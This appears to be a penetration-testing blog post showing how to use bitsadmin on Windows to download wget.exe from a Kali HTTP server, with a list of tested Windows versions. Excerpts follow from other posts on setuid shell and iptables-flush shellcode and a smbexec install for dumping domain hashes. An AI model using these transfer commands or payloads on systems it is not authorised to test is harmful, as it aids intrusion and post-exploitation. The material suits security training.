Skip to main content

Use bitsadmin For File Transfer


On Kali:
Set up an HTTP listener someplace where the wget.exe file can be fetched:
cd /usr/share/windows-binaries/
python -m SimpleHTTPServer 80


On Windows:
Create or change to a directory where your current user has permissions to create files:
mkdir \temp
cd \temp

Get the wget.exe file:
set HOSTIP=10.0.0.22
cmd /c "bitsadmin /transfer wcb /priority foreground http://%HOSTIP%/wget.exe %cd%\wget.exe"



Tested and working on default installs of:
Windows Vista 32 bit
Windows vista 64 bit
Windows server 2008 standard SP1 32 bit
Windows 7 SP1 32 bit
Windows 7 SP1 64 bit
Windows 8 32 bit
Windows 8 64 bit
Windows server 2012 64 bit

Did not work on Windows versions prior to Vista and is deprecated and not working on Windows 10.

Comments

Post a Comment

Popular posts from this blog

PolySetuidExecve1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification." http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE64-1434 Target Operating System : 64 bit Linux (x86_64 GNU/Linux) This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html The Original Version: http://shell-storm.org/shellcode/files/shellcode-77.php My Version: GitHub Link : https://github.com/rtaylor777/nasm/blob/master/PolySetuidExecve1434.nasm Published : https://www.exploit-db.com/exploits/41498/ Original Shellcode bytes = 49 My version: Number of bytes = 31 Number of nulls = 0 PolySetuidExecve1434.nasm Intro This shellcode when executed will first setuid(0) and then execute /bin/sh and provide you with a shell. The purpose of calling setuid(0) is, suppose that you have managed to inject this shellcode into an executable that is Set-UID root. I...
Post a Comment
Read more

PolyFlushIPTables1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification." http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE64-1434 Target Operating System : 64 bit Linux (x86_64 GNU/Linux) This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html The Original Version: http://shell-storm.org/shellcode/files/shellcode-683.php Original size: 50 bytes (don't believe what he says :) My Version: GitHub Link : https://github.com/rtaylor777/nasm/blob/master/PolyFlushIPTables1434.nasm Published : https://www.exploit-db.com/exploits/41503/ My version: Number of bytes = 47 Number of nulls = 0 PolyFlushIPTables1434.nasm  Intro This shellcode basically just executes /sbin/iptables -F without any other parameters. man iptables "-F, --flush [chain]               Flush ...
Post a Comment
Read more

Smbexec Install for Kali 2016.2

This is my how-to current as of August 31, 2017 . Context Kali Linux 2016.2 after: apt-get update apt-get upgrade apt-get dist-upgrade apt auto-remove restart Reason Training, see: https://www.cybrary.it/course/advanced-penetration-testing/ Video: https://www.cybrary.it/video/post-exploitation-part-4/ Downloads cd /opt git clone https://github.com/pentestgeek/smbexec.git git clone https://github.com/libyal/libesedb.git git clone https://github.com/csababarta/ntdsxtract /opt/NTDSXtract wget https://raw.githubusercontent.com/infoassure/dumpntds/master/dshashes.py -O /opt/NTDSXtract/dshashes.py Install Required Tools/Libraries apt-get install automake autoconf autopoint gcc-mingw-w64-x86-64 libtool pkg-config passing-the-hash ruby-nokogiri ruby-libxml libxml2-dev libxslt1-dev Build libesbdb cd /opt/libesedb/ ./synclibs.sh ./autogen.sh ./configure make Install Bundler gem install bundler   Install Smbexec First edit the file /opt/smbexec/smbe...
Post a Comment
Read more